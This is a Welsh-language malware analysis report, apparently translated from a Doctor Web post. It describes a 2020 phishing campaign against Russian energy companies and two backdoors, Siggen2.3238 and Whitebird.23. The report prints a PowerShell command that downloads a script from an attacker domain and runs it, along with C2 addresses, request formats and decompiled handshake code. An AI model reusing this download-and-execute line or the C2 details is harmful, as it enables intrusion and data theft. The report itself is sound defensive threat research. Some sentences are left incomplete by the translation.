Mae ein profiad o ymchwilio i ddigwyddiadau diogelwch cyfrifiadurol yn dangos bod e-bost yn dal i fod yn un o'r sianeli mwyaf cyffredin a ddefnyddir gan ymosodwyr i dreiddio i seilwaith rhwydwaith yr ymosodwyd arno i ddechrau. Mae un weithred ddiofal gyda llythyr amheus (neu ddim mor amheus) yn dod yn bwynt mynediad ar gyfer haint pellach, a dyna pam mae seiberdroseddwyr yn defnyddio dulliau peirianneg gymdeithasol yn weithredol, er gyda graddau amrywiol o lwyddiant.
Yn y swydd hon rydym am siarad am ein hymchwiliad diweddar i ymgyrch sbam sy'n targedu nifer o fentrau yn y cymhleth tanwydd ac ynni Rwsia. Dilynodd pob ymosodiad yr un senario gan ddefnyddio e-byst ffug, ac nid oedd yn ymddangos bod unrhyw un wedi rhoi llawer o ymdrech i gynnwys testun yr e-byst hyn.
Gwasanaeth cudd-wybodaeth
Dechreuodd y cyfan ddiwedd mis Ebrill 2020, pan ganfu dadansoddwyr firws Doctor Web ymgyrch sbam lle anfonodd hacwyr gyfeiriadur ffôn wedi'i ddiweddaru at weithwyr nifer o fentrau yng nghyfadeilad tanwydd ac ynni Rwsia. Wrth gwrs, nid oedd hyn yn destun pryder syml, gan nad oedd y cyfeiriadur yn real, ac roedd y dogfennau .docx yn lawrlwytho dwy ddelwedd o adnoddau anghysbell.
Cafodd un ohonyn nhw ei lawrlwytho i gyfrifiadur y defnyddiwr o'r gweinydd newyddion[.]zannews[.]com. Mae'n werth nodi bod yr enw parth yn debyg i barth canolfan gyfryngau gwrth-lygredd Kazakhstan - zannews[.]kz. Ar y llaw arall, roedd y parth a ddefnyddiwyd yn atgoffa ar unwaith o ymgyrch 2015 arall o'r enw TOPNEWS, a ddefnyddiodd ddrws cefn ICEFOG ac a oedd â pharthau rheoli Trojan gyda'r is-linyn “newyddion” yn eu henwau. Nodwedd ddiddorol arall oedd, wrth anfon e-byst at wahanol dderbynwyr, fod ceisiadau i lawrlwytho delwedd yn defnyddio naill ai paramedrau cais gwahanol neu enwau delwedd unigryw.
Credwn fod hyn wedi’i wneud at ddiben casglu gwybodaeth i ddod o hyd i berson “dibynadwy”, a fyddai wedyn yn sicr o agor y llythyr ar yr amser cywir. Defnyddiwyd protocol SMB i lawrlwytho'r ddelwedd o'r ail weinydd, y gellid ei wneud i gasglu hashes NetNTLM o gyfrifiaduron y gweithwyr a agorodd y ddogfen a dderbyniwyd.
A dyma'r llythyr ei hun gyda'r cyfeiriadur ffug:
Ym mis Mehefin eleni, dechreuodd hacwyr ddefnyddio enw parth newydd, sports[.]manhajnews[.]com, i uwchlwytho delweddau. Dangosodd y dadansoddiad fod is-barthau manhajnews[.]com wedi cael eu defnyddio mewn postiadau sbam ers o leiaf Medi 2019. Un o dargedau'r ymgyrch hon oedd prifysgol fawr yn Rwsia.
Hefyd, erbyn mis Mehefin, lluniodd trefnwyr yr ymosodiad destun newydd ar gyfer eu llythyrau: y tro hwn roedd y ddogfen yn cynnwys gwybodaeth am ddatblygiad y diwydiant. Roedd testun y llythyr yn nodi'n glir nad oedd ei awdur naill ai'n siaradwr Rwsieg brodorol, neu'n creu argraff o'r fath amdano'i hun yn fwriadol. Yn anffodus, roedd y syniadau o ddatblygiad diwydiant, fel bob amser, yn troi allan i fod yn ddim ond clawr - y ddogfen eto lawrlwytho dwy ddelwedd, tra bod y gweinydd ei newid i lawrlwytho[.]inklingpaper[.]com.
Dilynodd yr arloesedd nesaf ym mis Gorffennaf. Mewn ymgais i osgoi canfod dogfennau maleisus gan raglenni gwrthfeirws, dechreuodd ymosodwyr ddefnyddio dogfennau Microsoft Word wedi'u hamgryptio â chyfrinair. Ar yr un pryd, penderfynodd yr ymosodwyr ddefnyddio techneg peirianneg gymdeithasol glasurol - hysbysiad gwobr.
Ysgrifennwyd testun yr apêl eto yn yr un arddull, a gododd hyn amheuaeth ychwanegol ymhlith y derbynnydd. Ni newidiodd y gweinydd ar gyfer lawrlwytho'r ddelwedd chwaith.
Sylwch, ym mhob achos, y defnyddiwyd blychau post electronig a gofrestrwyd ar y parthau post[.]ru ac yandex[.]ru i anfon llythyrau.
Ymosodiad
Erbyn dechrau mis Medi 2020, roedd yn amser gweithredu. Cofnododd ein dadansoddwyr firws don newydd o ymosodiadau, lle anfonodd ymosodwyr lythyrau eto o dan yr esgus o ddiweddaru cyfeiriadur ffôn. Fodd bynnag, y tro hwn roedd yr atodiad yn cynnwys macro maleisus.
Wrth agor y ddogfen atodedig, creodd y macro ddwy ffeil:
- Sgript VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, a fwriadwyd i lansio swp ffeil;
- Y swp ffeil ei hun %APPDATA%configstest.bat, a gafodd ei guddio.
Hanfod ei waith yw lansio cragen Powershell gyda pharamedrau penodol. Mae'r paramedrau a drosglwyddir i'r gragen yn cael eu dadgodio i orchmynion:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Fel a ganlyn o'r gorchmynion a gyflwynwyd, mae'r parth y mae'r llwyth tâl yn cael ei lawrlwytho ohono wedi'i guddio eto fel gwefan newyddion. A syml , a'i unig dasg yw derbyn cod cragen o'r gweinydd gorchymyn a rheoli a'i weithredu. Roeddem yn gallu nodi dau fath o ddrws cefn y gellir eu gosod ar gyfrifiadur personol y dioddefwr.
BackDoor.Siggen2.3238
Yr un cyntaf yw BackDoor.Siggen2.3238 - nid oedd ein harbenigwyr wedi dod ar eu traws o'r blaen, ac ni chrybwyllwyd y rhaglen hon gan werthwyr gwrthfeirws eraill ychwaith.
Mae'r rhaglen hon yn ddrws cefn wedi'i ysgrifennu yn C++ ac yn rhedeg ar systemau gweithredu Windows 32-bit.
BackDoor.Siggen2.3238 yn gallu cyfathrebu â'r gweinydd rheoli gan ddefnyddio dau brotocol: HTTP a HTTPS. Mae'r sampl a brofwyd yn defnyddio'r protocol HTTPS. Defnyddir yr Asiant Defnyddiwr canlynol mewn ceisiadau i'r gweinydd:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Yn yr achos hwn, mae pob cais yn cael ei gyflenwi â'r set ganlynol o baramedrau:
%s;type=%s;length=%s;realdata=%send
lle mae pob llinell %s yn cael ei disodli'n gyfatebol gan:
- ID y cyfrifiadur heintiedig,
- math o gais sy'n cael ei anfon,
- hyd y data yn y maes data real,
- data.
Ar y cam o gasglu gwybodaeth am y system heintiedig, mae'r drws cefn yn cynhyrchu llinell fel:
lan=%s;cmpname=%s;username=%s;version=%s;
lle lan yw cyfeiriad IP y cyfrifiadur heintiedig, cmpname yw enw'r cyfrifiadur, enw defnyddiwr yw'r enw defnyddiwr, fersiwn yw'r llinell 0.0.4.03.
Anfonir y wybodaeth hon gyda'r dynodwr sysinfo trwy gais POST i'r gweinydd rheoli sydd wedi'i leoli yn https[:]//31.214[.]157.14/log.txt. Os mewn ymateb BackDoor.Siggen2.3238 yn derbyn y signal HEART, ystyrir bod y cysylltiad yn llwyddiannus, ac mae'r drws cefn yn cychwyn y prif gylch cyfathrebu â'r gweinydd.
Disgrifiad mwy cyflawn o egwyddorion gweithredu BackDoor.Siggen2.3238 sydd yn ein .
BackDoor.Whitebird.23
Mae'r ail raglen yn addasiad o'r backdoor BackDoor.Whitebird, sydd eisoes yn hysbys i ni o'r digwyddiad gydag asiantaeth y llywodraeth yn Kazakhstan. Mae'r fersiwn hwn wedi'i ysgrifennu yn C++ ac mae wedi'i gynllunio i redeg ar systemau gweithredu Windows 32-bit a 64-bit.
Fel y rhan fwyaf o raglenni o'r math hwn, BackDoor.Whitebird.23 wedi'i gynllunio i sefydlu cysylltiad wedi'i amgryptio â'r gweinydd rheoli a rheolaeth anawdurdodedig o gyfrifiadur heintiedig. Wedi'i osod mewn system dan fygythiad gan ddefnyddio dropper .
Roedd y sampl a archwiliwyd gennym yn llyfrgell faleisus gyda dau allforion:
- Google Play
- Prawf.
Ar ddechrau ei waith, mae'n dadgryptio'r cyfluniad sydd wedi'i wifro'n galed i'r corff drws cefn gan ddefnyddio algorithm yn seiliedig ar weithrediad XOR gyda beit 0x99. Mae'r cyfluniad yn edrych fel:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Er mwyn sicrhau ei weithrediad cyson, mae'r drws cefn yn newid y gwerth a bennir yn y maes Oriau gweithio cyfluniadau. Mae'r maes yn cynnwys 1440 beit, sy'n cymryd y gwerthoedd 0 neu 1 ac yn cynrychioli pob munud o bob awr yn y dydd. Yn creu edefyn ar wahân ar gyfer pob rhyngwyneb rhwydwaith sy'n gwrando ar y rhyngwyneb ac yn edrych am becynnau awdurdodi ar y gweinydd dirprwy o'r cyfrifiadur heintiedig. Pan ganfyddir pecyn o'r fath, mae'r drws cefn yn ychwanegu gwybodaeth am y gweinydd dirprwy i'w restr. Yn ogystal, gwiriadau am bresenoldeb dirprwy trwy WinAPI InternetQueryOptionW.
Mae'r rhaglen yn gwirio'r funud a'r awr gyfredol ac yn ei gymharu â'r data yn y maes Oriau gweithio cyfluniadau. Os nad yw'r gwerth ar gyfer munud cyfatebol y dydd yn sero, yna sefydlir cysylltiad â'r gweinydd rheoli.
Mae sefydlu cysylltiad â'r gweinydd yn efelychu creu cysylltiad gan ddefnyddio protocol fersiwn 1.0 TLS rhwng y cleient a'r gweinydd. Mae corff y drws cefn yn cynnwys dwy glustog.
Mae'r byffer cyntaf yn cynnwys y pecyn TLS 1.0 Client Hello.
Mae'r ail glustog yn cynnwys pecynnau Cyfnewid Allwedd Cleient TLS 1.0 gyda hyd allweddol o 0x100 bytes, Newid Manyleb Cipher, Neges Ysgwyd Llaw wedi'i Amgryptio.
Wrth anfon pecyn Helo Cleient, mae'r drws cefn yn ysgrifennu 4 beit o'r amser presennol a 28 beit o ddata ffug-hap yn y maes Cleient ar Hap, wedi'i gyfrifo fel a ganlyn:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Anfonir y pecyn a dderbyniwyd at y gweinydd rheoli. Mae'r ymateb (pecyn Server Hello) yn gwirio:
- cydymffurfio â fersiwn protocol TLS 1.0;
- gohebiaeth y stamp amser (4 beit cyntaf y maes pecyn Data Ar Hap) a bennir gan y cleient i'r stamp amser a bennir gan y gweinydd;
- cyfateb y 4 beit cyntaf ar ôl y stamp amser ym maes Data Ar Hap y cleient a'r gweinydd.
Yn achos y gemau penodedig, mae'r drws cefn yn paratoi pecyn Cyfnewid Allwedd Cleient. I wneud hyn, mae'n addasu'r Allwedd Gyhoeddus yn y pecyn Cyfnewid Allwedd Cleient, yn ogystal â'r Amgryptio IV a Data Amgryptio yn y pecyn Neges Ysgwyd Llaw Amgryptio.
Yna mae'r drws cefn yn derbyn y pecyn gan y gweinydd gorchymyn a rheoli, yn gwirio bod y fersiwn protocol TLS yn 1.0, ac yna'n derbyn 54 beit arall (corff y pecyn). Mae hyn yn cwblhau'r gosodiad cysylltiad.
Disgrifiad mwy cyflawn o egwyddorion gweithredu BackDoor.Whitebird.23 sydd yn ein .
Casgliad a Chasgliadau
Mae dadansoddiad o ddogfennau, malware, a'r seilwaith a ddefnyddir yn ein galluogi i ddweud yn hyderus bod yr ymosodiad wedi'i baratoi gan un o'r grwpiau APT Tsieineaidd. O ystyried ymarferoldeb drysau cefn sy'n cael eu gosod ar gyfrifiaduron dioddefwyr os bydd ymosodiad llwyddiannus, mae haint yn arwain, o leiaf, at ddwyn gwybodaeth gyfrinachol o gyfrifiaduron sefydliadau yr ymosodwyd arnynt.
Yn ogystal, senario tebygol iawn yw gosod Trojans arbenigol ar weinyddion lleol sydd â swyddogaeth arbennig. Gallai'r rhain fod yn rheolwyr parth, gweinyddwyr post, pyrth Rhyngrwyd, ac ati. Fel y gallem weld yn yr enghraifft , mae gweinyddwyr o'r fath o ddiddordeb arbennig i ymosodwyr am wahanol resymau.
Ffynhonnell: hab.com